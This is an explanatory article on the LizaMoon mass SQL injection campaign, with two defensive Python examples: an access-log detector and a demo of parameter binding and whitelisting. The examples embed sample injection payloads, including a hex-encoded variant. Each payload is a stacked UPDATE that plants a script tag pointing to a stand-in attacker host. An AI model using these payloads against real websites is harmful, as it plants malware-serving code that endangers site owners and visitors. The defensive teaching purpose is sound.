LizaMoon Outbreak

LizaMoon is the name of a recent attack on numerous websites that has been ongoing since September 2010. This two-part SQL injection attack was named after one of the original domains hosting the attack code. In the first part, an injection attack against the web application plants a reference to attacker-hosted script in the site's database, so that the site's own pages now carry a malware payload. The second half of the attack hits the end user, who upon visiting the website is redirected to a trojan delivering scareware, or fake anti-virus software. The attacks were originally detected by the security software vendor Websense. The LizaMoon attack, whose scale was at first grossly over-estimated, is still reported to have reached epidemic proportions, with Google searches for the injected script turning up as many as 380,000 results as of March 31, 2011. That number seems to be increasing, even though efforts have been made to block the domain and remove the malware.

According to Trend Micro's TrendLabs Malware Blog, “The LizaMoon attack is an SQL-Injection attack, targeting a vast amount of unrelated websites, including several catalog pages on Apple's iTunes. The attack inserts a line of code referencing a PHP script which redirects legitimate websites to other malware sites, including the FAKEAV and WORID malware. Further analysis by TrendMicro researchers reveals that ASPX and ASP web app sites are being exploited by a GET request containing parameters with SQL statements and the encoded script tag and URL shown below:

[request sample not reproduced]

Retrieved samples from active instances are now detected as TROJ_FAKEAV.BBK and TROJ_WORID.A.” (http://blog.trendmicro.com/lizamoon-etc-sql-injection-attack-still-on-going/)
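Trend Micro's description of the vector, a GET request whose parameters carry SQL statements and an encoded script tag, is enough to write a first-pass detector over web server access logs. The following is an added example, not part of the original article and not the request sample Trend Micro published; the log lines are constructed in Apache combined format rather than taken from a real server, and malicious.example stands in for the attacker's host (the real domain is not reproduced here). It goes slightly beyond the page: besides percent-decoding it also expands SQL hex literals (0x3c73...), a common way mass-injection tooling of this kind hid the tag inside CAST(), and it decodes a second time to catch double encoding.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Placeholder for the attacker's script host (assumption; not the real LizaMoon domain).
INJECTED_TAG = "<script src=http://malicious.example/ur.php></script>"
HEX_TAG = INJECTED_TAG.encode("ascii").hex()

# Constructed Apache-combined-style access log lines, not a real capture.
# Line 1: stacked UPDATE with the script tag, percent-encoded.
# Line 2: the same tag smuggled as a hex literal through CAST().
# Lines 3-4: benign requests that must not be flagged.
SAMPLE_LOG = f"""\
203.0.113.5 - - [31/Mar/2011:10:15:01 +0000] "GET /catalog/item.aspx?id=1%3B+UPDATE+products+SET+description%3Ddescription%2B%27%3Cscript+src%3Dhttp%3A%2F%2Fmalicious.example%2Fur.php%3E%3C%2Fscript%3E%27-- HTTP/1.1" 200 5123
203.0.113.5 - - [31/Mar/2011:10:15:02 +0000] "GET /catalog/item.asp?id=2%3B+UPDATE+products+SET+description%3Ddescription%2BCAST(0x{HEX_TAG}+AS+VARCHAR(8000))-- HTTP/1.1" 200 5123
198.51.100.7 - - [31/Mar/2011:10:16:40 +0000] "GET /search.asp?q=update+on+javascript+tutorials HTTP/1.1" 200 2210
198.51.100.7 - - [31/Mar/2011:10:16:41 +0000] "GET /catalog/item.aspx?id=2 HTTP/1.1" 200 4877
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+) \S+$'
)
SQL_RE = re.compile(r"\b(UPDATE|INSERT|DELETE|DECLARE|EXEC|CAST)\b", re.I)
TAG_RE = re.compile(r"<\s*script\b", re.I)
HEX_RE = re.compile(r"0x([0-9a-fA-F]{2,})")


def decode_hex_literals(text):
    """Replace SQL hex literals with their ASCII text when they decode cleanly and
    are printable, so a tag carried through CAST(0x... AS VARCHAR) is visible to
    the same checks as a plain one."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        try:
            ascii_text = bytes.fromhex(digits).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
        return ascii_text if ascii_text.isprintable() else m.group(0)
    return HEX_RE.sub(repl, text)


def normalise(value):
    """Percent-decode up to two further times (double encoding is a common
    evasion; '+' is left alone because it may be T-SQL string concatenation
    at this point), then expand hex literals."""
    for _ in range(2):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return decode_hex_literals(value)


def scan_access_log(text):
    """Flag every request whose decoded query parameters carry both an SQL
    statement keyword and a <script> tag. Returns (client ip, path, parameter)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                decoded = normalise(value)
                if SQL_RE.search(decoded) and TAG_RE.search(decoded):
                    findings.append((m.group("ip"), parts.path, name))
    return findings


if __name__ == "__main__":
    for ip, path, param in scan_access_log(SAMPLE_LOG):
        print(f"{ip} injected via {path}?{param}")
```

Requiring both a statement keyword and a tag keeps the benign search for "update on javascript tutorials" out of the findings; on a real server, a hit on an .asp or .aspx handler with a 200 response is the signal to go and inspect the database, because the server answered the poisoned request normally.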

A recently released FAQ from Websense, the security firm credited with the initial discovery of LizaMoon, explains: "Everything points to that this is a vulnerability in a web application. We don't know which one(s) yet but SQL Injection attacks work by issuing SQL commands in un-sanitized input to the server. That doesn't mean it's a vulnerability in the SQL Server itself, it means that the Web application isn't filtering input from the user correctly." (http://www.pcworld.com/businesscenter/article/224125/lizamoon_attack_what_you_need_to_know.html)

With all of the data in hand, it is easy to see that this was not a highly advanced or especially dangerous piece of malware. Rather, this attack was designed to compromise thousands of hosts and, through them, serve still more malware to huge user bases. It is advanced in the sense of how many stages it passes through before striking the end user (an injected SQL statement, a script reference stored in the site's database, a PHP redirector, and finally the scareware download), but even then the end user must be unaware and fall victim to a cheap social-engineering trick. In terms of the awareness it demands, no, I do not think this hack is advanced; in fact, there are many preventative measures we can take against the LizaMoon outbreak.

The SANS Internet Storm Center, a security monitoring service, states that “Defense against your sites getting infected is the standard things we ought to be doing anyway in regards to SQL injection (i.e. use prepared statements, filter input for control characters, whitelist if possible, blacklist if not). Webserver administrators should also be checking for sudden appearance of files in their httpdocs directory.” (http://isc.sans.edu/diary/LizaMoon+Mass+SQLInjection+Attack+Infected+at+least+500k+Websites/10642)
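The two defences SANS lists first, prepared statements and whitelisting, together with the database-side check that complements its advice to watch httpdocs, as an added worked example that is not part of the original article or of any vendor's published code. It uses an in-memory SQLite table and a placeholder script host (malicious.example, an assumption; the real LizaMoon domain is not reproduced). The vulnerable handler splits on semicolons to emulate a driver that honours stacked statements, as SQL Server does behind the ASP/ASPX sites Trend Micro describes; the hardened handler binds the parameter and whitelists its shape; find_injected_script scans every text column for a planted tag, which is the database counterpart of looking for new files in the web root.

```python
import sqlite3

# Placeholder script host (assumption for this example; not the real LizaMoon domain).
INJECTED_TAG = '<script src="http://malicious.example/ur.php"></script>'


def make_db():
    """Build an in-memory catalogue with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)")
    conn.executemany(
        "INSERT INTO products (id, name, description) VALUES (?, ?, ?)",
        [(1, "Widget", "A basic widget."), (2, "Gadget", "A deluxe gadget.")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, product_id):
    """The 'before': the request parameter is concatenated straight into SQL.

    SQLite's execute() runs one statement at a time, so the text is split on
    ';' here to emulate a driver that honours stacked statements, as SQL
    Server does behind the ASP/ASPX sites hit by this campaign.
    """
    sql = "SELECT name FROM products WHERE id = " + product_id
    rows = []
    for stmt in sql.split(";"):
        if stmt.strip():
            rows = conn.execute(stmt).fetchall()
    conn.commit()
    return rows


def lookup_bound(conn, product_id):
    """Binding alone: the whole string is sent as a value and never parsed as
    SQL, so the stacked UPDATE is inert (the query simply matches no row)."""
    return conn.execute("SELECT name FROM products WHERE id = ?", (product_id,)).fetchall()


def lookup_safe(conn, product_id):
    """The 'after': whitelist the parameter's shape, then bind it."""
    if not product_id.isdigit():
        raise ValueError("product id must be a positive integer")
    return conn.execute("SELECT name FROM products WHERE id = ?", (int(product_id),)).fetchall()


def find_injected_script(conn):
    """Scan every text column of every user table for a planted <script> tag.
    Returns (table, column, affected row count) triples.

    Identifiers come from the schema catalogue, not from a request, so the
    f-strings here are safe; the search pattern itself is still bound.
    """
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _, col, col_type, *_ in conn.execute(f'PRAGMA table_info("{table}")'):
            if not any(t in col_type.upper() for t in ("TEXT", "CHAR", "CLOB")):
                continue
            n = conn.execute(
                f'SELECT COUNT(*) FROM "{table}" WHERE "{col}" LIKE ?', ("%<script%",)
            ).fetchone()[0]
            if n:
                hits.append((table, col, n))
    return hits


def demo():
    """Run the same payload against each handler and report what happened."""
    payload = "1; UPDATE products SET description = description || '" + INJECTED_TAG + "'"
    vuln = make_db()
    before = find_injected_script(vuln)
    lookup_vulnerable(vuln, payload)          # the stacked UPDATE runs here
    after = find_injected_script(vuln)

    safe = make_db()
    bound_rows = lookup_bound(safe, payload)  # returns [] and changes nothing
    try:
        lookup_safe(safe, payload)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "before": before,
        "after": after,
        "bound_rows": bound_rows,
        "rejected": rejected,
        "safe_db_hits": find_injected_script(safe),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The scan reports every row of every text column that now carries a tag, which is exactly what a mass-injection UPDATE produces: one poisoned request rewrites all rows, so a single hit count equal to the table size is the tell. Binding on its own is enough to stop the injection; the isdigit whitelist is the cheap extra layer SANS recommends for parameters whose shape is known.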

End users are advised to keep their anti-virus and anti-malware software updated. Although many of the websites affected are low-traffic sites, the sheer number of infected sites continues to expose end users. The end user's browser, after loading the PHP script referenced by the injected tag, is led to a scareware prompt advertising fake anti-virus software; this scareware then forces downloads of further trojans onto the infected machine. Although some high-profile sites such as iTunes were reported as infected, sites with proper security precautions in place (parameterised queries and input validation) did not suffer the exploit and should pose no risk to end users. The community is now alert and anti-virus signatures have been released, but increased vigilance is still required on the part of users at this time.